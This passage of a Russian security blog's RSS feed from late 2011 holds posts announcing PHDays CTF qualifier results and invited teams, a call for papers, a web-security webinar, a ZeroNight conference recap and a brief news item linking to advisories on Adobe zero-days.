1em;"&gt;&lt;img border="0" height="140" src="http://3.bp.blogspot.com/-gXak63jeiR0/TvoC-Ew32RI/AAAAAAAABXk/aMZozcmVmn0/s200/PHD+CTF+AfterParty+2011+kyprizel.png" width="200" /&gt;&lt;/a&gt;Завершился двухнедельный конкурс по практической защите информации в рамках&amp;nbsp;&lt;a href="http://phday.ru/ctf_afterparty_rating.asp"&gt;PHDays CTF AfterParty 2011&lt;/a&gt;. Победителем соревнования стал участник под псевдонимом&amp;nbsp;&lt;a href="https://twitter.com/#!/kyprizel"&gt;kyprizel&lt;/a&gt;, набравший максимальное число очков из числа возможных. Респект и уважуха!!!&lt;br /&gt;
&lt;br /&gt;
В качестве приза он получит самую новую версию легендарного сканера безопасности &lt;a href="http://www.ptsecurity.ru/xs7.asp"&gt;XSpider 7.8&lt;/a&gt;&amp;nbsp;и приглашение на международный форум &lt;a href="http://phday.ru/"&gt;Positive Hack Days&lt;/a&gt; 2012 в качестве участника. Остальных победителей, а это участники, которые заняли 2-17 места на 25.12, ждут дипломы и подарки от организатора соревнований – компании &lt;a href="http://www.ptsecurity.ru/"&gt;Positive Technologies&lt;/a&gt;.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Спасибо всем, кто принимал участие в соревнованиях&amp;nbsp;&lt;a href="http://phday.ru/ctf_quals.asp"&gt;CTF Quals&lt;/a&gt; и &lt;a href="http://phday.ru/ctf_afterparty.asp"&gt;CTF Afterparty&lt;/a&gt;! Я надеюсь участие в этих конкурсах принесло вам массу позитивных эмоций :) А для всех тех, кто не смог принять участие в этих конкурсах, но желал бы проверить свои хакерские способности, &lt;a href="http://phday.ru/smt.asp?gnum=1"&gt;регистрация&lt;/a&gt; и участие в&amp;nbsp;&lt;a href="http://phday.ru/ctf_afterparty_rating.asp"&gt;PHDays CTF AfterParty 2011&lt;/a&gt;&amp;nbsp;продлена до 20-го января 2012 года.&lt;br /&gt;
&lt;br /&gt;
И, разумеется, если Вам есть, что сказать, будем благодарны за объективную критику и общие отзывы об этих конкурсах.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-7234282828438677928?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-27T21:42:08.147+04:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-gXak63jeiR0/TvoC-Ew32RI/AAAAAAAABXk/aMZozcmVmn0/s72-c/PHD+CTF+AfterParty+2011+kyprizel.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">11</thr:total></item><item><title>Positive Hack Days CTF 2012 (предварительный список команд)</title><link>http://devteev.blogspot.com/2011/12/positive-hack-days-ctf-2012.html</link><category>CTF</category><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 20 Dec 2011 02:25:44 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-123000528886179425</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Определился список команд, которые будут приглашены на соревнования по практической безопасности &lt;a href="http://phdays.ru/ctf_general.asp"&gt;Positive Hack Days CTF&lt;/a&gt; 2012. По результатам отборочных испытаний &lt;a href="http://phdays.ru/ctf_quals.asp"&gt;CTF Quals 2011&lt;/a&gt; приглашения получат следующие команды:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-87s6CB2KSdo/TvBiIoX86qI/AAAAAAAABXU/BzR3ZZ626hY/s1600/phdays_ctf_2012.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="141" src="http://2.bp.blogspot.com/-87s6CB2KSdo/TvBiIoX86qI/AAAAAAAABXU/BzR3ZZ626hY/s200/phdays_ctf_2012.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;- eindbazen, Нидерланды&lt;br /&gt;
- leetmore, Россия&lt;br /&gt;
- int3pids, Испания&lt;br /&gt;
- HackerDom, Россия&lt;br /&gt;
- 0daysober, Франция&lt;br /&gt;
&lt;br /&gt;
(почему команда &lt;a href="https://rdot.org/forum/"&gt;rdot.org&lt;/a&gt; не примет участие в PHDays CTF 2012? Это большой большой секрет :))&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Личные приглашения получат следующие команды:&lt;br /&gt;
- Plaid Parliament of Pwning, США&lt;br /&gt;
- BIOS, Индия&lt;br /&gt;
- Shell-storm, Франция/Швейцария&lt;br /&gt;
- C.o.P, Франция&lt;br /&gt;
- IV, Россия&lt;br /&gt;
- FluxFingers, Германия&lt;br /&gt;
- HNG48, Япония&lt;br /&gt;
&lt;br /&gt;
Призовой  фонд CTF 2012 до конца не определен, но предполагается его увеличение;) &lt;br /&gt;
&lt;br /&gt;
P.S. Если найдутся желающие собрать 1-2 запасных команд (на случай форс мажора с основными командами), пишите на почту devteev@ptsecurity.ru.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-123000528886179425?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-20T14:25:44.520+04:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-87s6CB2KSdo/TvBiIoX86qI/AAAAAAAABXU/BzR3ZZ626hY/s72-c/phdays_ctf_2012.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total></item><item><title>Positive Hack Days Young School &amp; CFP is open!</title><link>http://devteev.blogspot.com/2011/12/positive-hack-days-young-school-cfp-is.html</link><category>мероприятия</category><category>cfp</category><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Thu, 15 Dec 2011 06:59:07 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-8157653488303590287</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;С сегодняшнего дня открывается регистрация докладов на &lt;a href="http://phdays.ru/ys.asp"&gt;конкурс работ молодых ученых по информационной безопасности&lt;/a&gt; и&amp;nbsp;на выступление в &lt;a href="http://phdays.ru/cfp.asp"&gt;основной секции&lt;/a&gt; международного форума по практической безопасности &lt;a href="http://phdays.ru/"&gt;Positive Hack Days&lt;/a&gt;&amp;nbsp;2012.&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Подробности приема заявок доступны по соответствующим ссылкам:&lt;/div&gt;&lt;div&gt;-&amp;nbsp;&lt;a href="http://phdays.ru/ys.asp"&gt;&lt;b&gt;Young School&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;-&amp;nbsp;&lt;a href="http://phdays.ru/cfp.asp"&gt;&lt;b&gt;Call for Papers&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-8157653488303590287?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-15T18:59:07.469+04:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>PHDAYS CTF Quals 2011 competitions completed</title><link>http://devteev.blogspot.com/2011/12/phdays-ctf-quals-2011-competitions.html</link><category>quals</category><category>CTF</category><category>HackQuest</category><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Sun, 11 Dec 2011 07:01:11 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-2841827399020634363</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Отборочные соревнования &lt;a href="http://phdays.ru/ctf_quals.asp"&gt;PHDAYS CTF Quals&lt;/a&gt; завершены. Лидеры соревнования:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-HslRhgLrlVE/TuTBRS1WtYI/AAAAAAAABXA/6qaDjt_TplU/s1600/PHDAYS+CTF+Quals+TOP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="http://2.bp.blogspot.com/-HslRhgLrlVE/TuTBRS1WtYI/AAAAAAAABXA/6qaDjt_TplU/s640/PHDAYS+CTF+Quals+TOP.png" width="600" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;Ознакомиться с полным рейтингом отборочных соревнований можно по следующей ссылке: &lt;a href="http://phdays.ru/ctf_quals_rating.asp"&gt;http://phdays.ru/ctf_quals_rating.asp&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
По результатам CTF Quals пять наиболее сильных команд будут приглашены на очные соревнования &lt;a href="http://phdays.ru/ctf_general.asp"&gt;PHDAYS CTF&lt;/a&gt;, которые пройдут в Москве 30-31 мая в 2012 году. Стоит добавить, что часть команд были приглашены организаторами форума &lt;a href="http://phdays.ru/organizers.asp"&gt;Positive Hack Days&lt;/a&gt; вне зачета и таким образом предполагается, что в соревнованиях PHDAYS CTF 2012 будут соперничать 12-15 команд. Окончательный список команд будет опубликован до конца года (следите за новостями).&lt;br /&gt;
&lt;br /&gt;
Спасибо всем за участие в отборочных соревнованиях PHDAYS CTF Quals! И уже завтра битва будет продолжена в рамках&amp;nbsp;&lt;a href="http://phdays.ru/ctf_afterparty.asp"&gt;CTF Afterparty&lt;/a&gt;, y a w3lc0me!&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-2841827399020634363?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-11T19:01:11.896+04:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-HslRhgLrlVE/TuTBRS1WtYI/AAAAAAAABXA/6qaDjt_TplU/s72-c/PHDAYS+CTF+Quals+TOP.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total></item><item><title>PHDAYS CTF Quals 2011</title><link>http://devteev.blogspot.com/2011/12/phdays-ctf-quals-2011.html</link><category>quals</category><category>CTF</category><category>HackQuest</category><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Sat, 10 Dec 2011 00:16:11 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-6730392072449308295</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-P2HOdcG70Z8/TuMVK0OgplI/AAAAAAAABW4/nZv46eAX9jE/s1600/x_d8d529dd.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="97" src="http://3.bp.blogspot.com/-P2HOdcG70Z8/TuMVK0OgplI/AAAAAAAABW4/nZv46eAX9jE/s400/x_d8d529dd.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;Отборочные соревнования &lt;a href="http://phdays.ru/ctf_quals.asp"&gt;PHDAYS CTF Quals&lt;/a&gt; 2011 в самом разгаре! Командам участникам соревнования следует авторизоваться в &lt;a href="http://phdays.ru/ctf_quals_online.asp"&gt;личном кабинете&lt;/a&gt; для получения необходимых реквизитов доступа. С легендой используемой игровой инфраструктуры можно ознакомиться на сайте мероприятия:&amp;nbsp;&lt;a href="http://phdays.ru/monolith.asp"&gt;http://phdays.ru/monolith.asp&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Следить за рейтингом отборочного соревнования можно по следующей ссылке: &lt;a href="http://phdays.ru/ctf_quals_rating.asp"&gt;http://phdays.ru/ctf_quals_rating.asp&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Напомню, что лидеры отборочных соревнований CTF Quals будут приглашены на очные соревнования PHDAYS CTF, которые пройдут в Москве 30-31 мая в 2012 году.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Сразу же после окончания отборочного соревнования стартует конкурс &lt;a href="http://phdays.ru/ctf_afterparty.asp"&gt;PHDAYS CTF Afterparty&lt;/a&gt;, участники которого могут повторить подвиги своих предшественников. Наиболее проявившие себя участники CTF Afterparty также будут приглашены на международный форум &lt;a href="http://phdays.ru/"&gt;Positive Hack Days 2012&lt;/a&gt;.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-6730392072449308295?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-10T12:16:11.664+04:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-P2HOdcG70Z8/TuMVK0OgplI/AAAAAAAABW4/nZv46eAX9jE/s72-c/x_d8d529dd.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Очередная атака нулевого дня через продукты Adobe</title><link>http://devteev.blogspot.com/2011/12/adobe.html</link><category>client-side</category><category>security</category><category>0day</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Wed, 07 Dec 2011 06:30:04 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-4957999706431707488</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;a href="http://1.bp.blogspot.com/-q66ulSKuXlc/Tt93xxPpoJI/AAAAAAAABWw/6XcshAKb8e4/s1600/adobe_vulnerability.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://1.bp.blogspot.com/-q66ulSKuXlc/Tt93xxPpoJI/AAAAAAAABWw/6XcshAKb8e4/s200/adobe_vulnerability.jpg" width="103" /&gt;&lt;/a&gt;Сообщество вновь переживает сильные эмоции по поводу очередных проблем безопасности, которые (неожиданно) были обнаружены в продуктах всеми любимой компании Adobe. Проблема затрагивает программное обеспечение Adobe Reader на всех основных платформах Windows, Macintosh и UNIX т.е. атака вполне может быть&amp;nbsp;кроссплатформенной. Подробности: &lt;a href="http://www.adobe.com/support/security/advisories/apsa11-04.html"&gt;http://www.adobe.com/support/security/advisories/apsa11-04.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
В тоже время, как-то тихо и незаметно в сплоит паке &lt;a href="http://intevydis.com/sa.shtml"&gt;VulnDisco&lt;/a&gt; под &lt;a href="http://immunityinc.com/products-canvas.shtml"&gt;IMMUNITY Canvas&lt;/a&gt; появился 0day в Adobe Flash: &lt;a href="https://lists.immunityinc.com/pipermail/canvas/2011-November/000082.html"&gt;https://lists.immunityinc.com/pipermail/canvas/2011-November/000082.html&lt;/a&gt;, &lt;a href="http://seclists.org/dailydave/2011/q4/80"&gt;http://seclists.org/dailydave/2011/q4/80&lt;/a&gt;. Таким образом, использование&amp;nbsp;уязвимостей&amp;nbsp;в продуктах компании Adobe по-прежнему может составить конкуренцию использованию уязвимостей в Java.&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-4957999706431707488?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-07T18:30:04.699+04:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-q66ulSKuXlc/Tt93xxPpoJI/AAAAAAAABWw/6XcshAKb8e4/s72-c/adobe_vulnerability.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>ZeroNight: резюме</title><link>http://devteev.blogspot.com/2011/11/zeronight.html</link><category>мероприятия</category><category>security</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 29 Nov 2011 01:47:25 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-3657984385199295707</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Многие к этому моменту уже высказали свое мнение по поводу конференции &lt;a href="http://zeronights.ru/"&gt;ZeroNight&lt;/a&gt;&amp;nbsp;[&lt;a href="http://lukatsky.blogspot.com/2011/11/zeronights-vs-phd.html"&gt;1&lt;/a&gt;,&lt;a href="http://sgordey.blogspot.com/2011/11/zeronights_27.html"&gt;2&lt;/a&gt;,&lt;a href="http://amatrosov.blogspot.com/2011/11/zeronights.html"&gt;3&lt;/a&gt;,&lt;a href="http://reply-to-all.blogspot.com/2011/11/drive-by-download.html"&gt;4&lt;/a&gt;,&lt;a href="http://lukatsky.blogspot.com/2011/11/blog-post_28.html"&gt;5&lt;/a&gt;,&lt;a href="http://blog.oxdef.info/2011/11/zeronights-251111.html"&gt;6&lt;/a&gt;,&lt;a href="http://andrepetukhov.wordpress.com/2011/11/27/5-%D0%BA%D0%BE%D0%BF%D0%B5%D0%B5%D0%BA-zeronights/"&gt;7&lt;/a&gt;], которая проходила 25 ноября. Обобщая все высказывания могу отметить, что, по мнению большинства, мероприятие удалось, в большей степени, за счет высокого уровня  технических докладов (а что еще нужно для хорошей хакерской тусы?). Из минусов все участники конференции отмечают недостатки, связанные с организационными моментами.&lt;br /&gt;
&lt;br /&gt;
Собственное мнение я уже озвучил непосредственно организаторам мероприятия, потому не стану его транслировать сюда. В любом случае, мой отзыв заведомо будет расценен, как не объективный. Поэтому скажу лишь "э-ге-гей! Мы были на ZeroNight и отлично провели время!".&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-tFokfk_CFM8/TtSpPut3DeI/AAAAAAAABWQ/R_qa_BnuAI8/s1600/zn1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="356" src="http://1.bp.blogspot.com/-tFokfk_CFM8/TtSpPut3DeI/AAAAAAAABWQ/R_qa_BnuAI8/s640/zn1.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-SYZMpR6KScg/TtSpUIt1jII/AAAAAAAABWY/VnGmZEWeBW4/s1600/zn2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://3.bp.blogspot.com/-SYZMpR6KScg/TtSpUIt1jII/AAAAAAAABWY/VnGmZEWeBW4/s640/zn2.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-SFldwTqkDc4/TtSpa-hlY7I/AAAAAAAABWg/Ao0zbZdUtrU/s1600/zn3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://3.bp.blogspot.com/-SFldwTqkDc4/TtSpa-hlY7I/AAAAAAAABWg/Ao0zbZdUtrU/s640/zn3.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-jjGXk6X4f_M/TtSpeJTzfnI/AAAAAAAABWo/KsW66I3B1QE/s1600/zn4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="http://3.bp.blogspot.com/-jjGXk6X4f_M/TtSpeJTzfnI/AAAAAAAABWo/KsW66I3B1QE/s640/zn4.jpg" width="360" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-3657984385199295707?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-29T13:47:25.078+04:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-tFokfk_CFM8/TtSpPut3DeI/AAAAAAAABWQ/R_qa_BnuAI8/s72-c/zn1.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Основы безопасности веб-приложений</title><link>http://devteev.blogspot.com/2011/11/blog-post_24.html</link><category>вебинары</category><category>выступления</category><category>web security</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Thu, 24 Nov 2011 05:37:30 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-739944523692262765</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Презентация с сегодняшнего вебинара представлена ниже. Всем спасибо, кто потратил свое время на мое выступление!&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;br /&gt;
&lt;div style="width:425px" id="__ss_10307504"&gt;&lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/devteev/ss-10307504" title="Введение в тему безопасности веб-приложений" target="_blank"&gt;Введение в тему безопасности веб-приложений&lt;/a&gt;&lt;/strong&gt; &lt;iframe src="http://www.slideshare.net/slideshow/embed_code/10307504" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;/iframe&gt; &lt;div style="padding:5px 0 12px"&gt;View more &lt;a href="http://www.slideshare.net/" target="_blank"&gt;presentations&lt;/a&gt; from &lt;a href="http://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;/center&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-739944523692262765?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-24T17:37:30.214+04:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>Безопасность веб-приложений: просто о сложном</title><link>http://devteev.blogspot.com/2011/11/blog-post_23.html</link><category>вебинары</category><category>positive technologies</category><category>web security</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 22 Nov 2011 23:51:09 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-6199371978784375677</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;a href="http://2.bp.blogspot.com/-LR5-h5GZvgI/TsylqTH5NJI/AAAAAAAABWI/S-FU23siTRo/s1600/www.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="158" src="http://2.bp.blogspot.com/-LR5-h5GZvgI/TsylqTH5NJI/AAAAAAAABWI/S-FU23siTRo/s200/www.png" width="200" /&gt;&lt;/a&gt;Как бы далеко я не запланировал свои "пять копеек" в общей движухе серии &lt;a href="http://www.ptsecurity.ru/webinars.asp"&gt;бесплатных вебинаров&lt;/a&gt;, проводимых под логотипом &lt;a href="http://www.ptsecurity.ru/"&gt;Positive Technologies&lt;/a&gt;, день икс настал (неожиданно!;)). Поэтому &lt;a href="http://www.ptsecurity.ru/smt.asp?id=10"&gt;приглашаю завтра&lt;/a&gt; на свой вебинар по избитой теме безопасности веб-приложений. Ничего принципиально нового в рамках этого вебинара я не расскажу (и это должно быть очевидно из названия вебинара), но возможно помогу аудитории упорядочить уже имеющиеся знания в этой предметной области.&lt;br /&gt;
&lt;br /&gt;
Стоит отметить, что этот вебинар является первой ласточкой на пути к трехдневному курсу по безопасности веб-приложений, который мы будем разрабатывать и продвигать. Но это планы уже следующего года.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-6199371978784375677?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-23T11:51:09.090+04:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-LR5-h5GZvgI/TsylqTH5NJI/AAAAAAAABWI/S-FU23siTRo/s72-c/www.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Формат мероприятия Positive Hack Days</title><link>http://devteev.blogspot.com/2011/11/positive-hack-days.html</link><category>мероприятия</category><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Fri, 18 Nov 2011 02:34:58 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-3588863828627811571</guid><description>&lt;center&gt;&lt;br /&gt;
&lt;iframe src="http://player.vimeo.com/video/32307818?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="225" frameborder="0" webkitAllowFullScreen allowFullScreen&gt;&lt;/iframe&gt;&lt;p&gt;PHD 2011-2012 from &lt;a href="http://vimeo.com/ptsecurity"&gt;Positive Technologies&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;/center&gt;&lt;br /&gt;
&lt;br /&gt;
Напоминалко: регистрация на Positive Hack Days 2012 уже открыта и доступна по следующей ссылке - &lt;a href="http://phday.ru/registration.asp"&gt;http://phday.ru/registration.asp&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-3588863828627811571?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-18T14:34:58.940+04:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>CTF Quals / CTF Afterparty</title><link>http://devteev.blogspot.com/2011/11/ctf-quals-ctf-afterparty.html</link><category>quals</category><category>CTF</category><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 15 Nov 2011 03:07:51 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-6791203365894058087</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;В декабре стартует отборочный тур международных соревнований по защите информации &lt;a href="http://phdays.ru/ctf_general.asp"&gt;PHD CTF&lt;/a&gt;. Основные состязания пройдут 30–31 мая 2012 года в Москве во время второго международного форума по информационной безопасности &lt;a href="http://phdays.ru/"&gt;Positive Hack Days&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
В этом году все желающие могут попробовать свои силы в отборочном туре: &lt;a href="http://phdays.ru/ctf_quals.asp"&gt;CTF Quals&lt;/a&gt; или &lt;a href="http://phdays.ru/ctf_afterpaty.asp"&gt;CTF Afterparty&lt;/a&gt;. Все участники попробуют свои силы в оценке защищенности, поиске и эксплуатации уязвимостей, выполнении заданий на реверсинг и просто хакерстве. Причем борьба будет проходить в условиях, максимально приближенных к боевым: уязвимости, использованные в PHD CTF Quals и CTF Afterparty, не выдуманы, а встречаются в "живой природе".&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
10 и 11 декабря в отборочном туре PHD CTF Quals определятся лучшие команды, которые примут участие в финале PHD CTF в мае.&lt;br /&gt;
&lt;br /&gt;
С 12 по 25 декабря состязания продолжатся в индивидуальном зачете: самые яркие участники PHD CTF Afterparty 2011 получат дипломы от &lt;a href="http://www.ptsecurity.ru/"&gt;Positive Technologies&lt;/a&gt; и смогут продолжить борьбу на форуме PHD в мае 2012 года.&lt;br /&gt;
&lt;br /&gt;
Подробности и регистрация: &lt;a href="http://phdays.ru/registration.asp"&gt;http://phdays.ru/registration.asp&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-rJEfWvaXIl4/TsJH-XXBqlI/AAAAAAAABVw/Sb435HC1VXU/s1600/00.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="140" src="http://4.bp.blogspot.com/-rJEfWvaXIl4/TsJH-XXBqlI/AAAAAAAABVw/Sb435HC1VXU/s640/00.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
